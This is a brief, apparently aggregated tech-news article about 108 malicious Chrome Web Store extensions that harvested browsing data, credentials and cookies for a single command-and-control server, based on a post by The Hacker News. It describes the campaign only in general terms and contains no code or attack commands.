Google Chrome Users Unknowingly Installed Thousands Of Malicious Add-Ons
By 813 Staff
The latest development in AI and tech shows Google Chrome Users Unknowingly Installed Thousands Of Malicious Add-Ons, according to The Hacker News (@TheHackersNews) (in the last 24 hours).
Source: https://x.com/TheHackersNews/status/2043971537867534715
The recent surge in generative AI tools that can write, debug, and package code has pushed the frontier of software development forward at a breakneck pace. But internal documents from security firms and platform audits show this automation is also being weaponized, enabling threat actors to scale malicious campaigns with unprecedented efficiency. A stark example landed this week, as reported by The Hacker News (@TheHackersNews), with the discovery of a sprawling malware operation hiding in plain sight within the Chrome Web Store. Security researchers identified 108 distinct browser extensions, which had amassed a collective 20,000 installations, all secretly funneling data to a single, unified command-and-control backend.
The operation’s sophistication was in its fragmentation. Each extension appeared as a separate utility—productivity enhancers, ad blockers, and PDF converters—submitted by different developer accounts over a period of months. This atomized approach was designed to evade pattern-based detection by store moderators. However, forensic analysis revealed the extensions shared nearly identical obfuscated code and all communicated with the same infrastructure, indicating a coordinated campaign controlled by a single entity. The extensions functioned as data harvesters, capable of intercepting browsing history, login credentials, and session cookies, which were then exfiltrated to the central server.
For the average user and enterprise security teams, this incident underscores a critical vulnerability in the software supply chain. The trusted ecosystem of a major browser’s official store is now a primary attack surface. The extensions had passed Google’s automated review processes, which engineers close to the project say are increasingly strained by the volume of submissions, many now AI-generated. The impact is twofold: a direct compromise of user data for thousands of individuals and a erosion of trust in the store’s vetting integrity. Security leads at companies using Chrome are now forced to reconsider policies on employee extension installation, as a seemingly benign tool can become a corporate espionage vector overnight.
What happens next involves a painful cleanup and a pressing need for procedural overhaul. Google has reportedly removed the identified extensions, but the rollout of more effective detection has been anything but smooth. The central uncertainty is how many other clusters of similarly disguised extensions remain active. Researchers are now using the fingerprints of this campaign to hunt for copycats and variants. The industry is watching for Google’s response, which will likely involve a shift toward more behavioral analysis of extensions post-installation and possibly stricter requirements for developer verification. For now, the episode serves as a clear signal that the tools accelerating innovation are equally empowering those looking to exploit it.
Source: https://x.com/TheHackersNews/status/2043971537867534715
